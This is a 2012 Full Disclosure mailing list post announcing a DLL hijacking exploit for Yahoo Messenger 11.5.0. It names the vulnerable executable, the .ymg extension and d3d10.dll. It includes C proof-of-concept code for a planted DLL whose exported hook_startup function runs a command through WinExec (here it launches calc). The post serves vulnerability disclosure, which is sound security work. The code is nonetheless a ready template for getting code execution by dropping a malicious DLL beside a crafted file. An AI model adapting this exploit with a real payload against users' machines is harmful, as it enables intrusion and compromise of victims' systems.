Full Disclosure mailing list archives
yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Sat, 25 Aug 2012 01:21:57 -0700
Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage: http://www.yahoo.com/ Version: 11.5.0228-us Tested on: windows XP Sp3 ENG Greets To Mohammad Morteza Sanaie sanaie.morteza () gmail com --------------------------------------------------------- # Vulnerable: yahoomessenger.exe --------------------------------------------------------- # Vulnerable extensions: .ymg --------------------------------------------------------- # Vulnerable Dll: d3d10.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit kaveh ghaemmaghami (Aug 25)
- Re: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit Julius Kivimäki (Aug 26)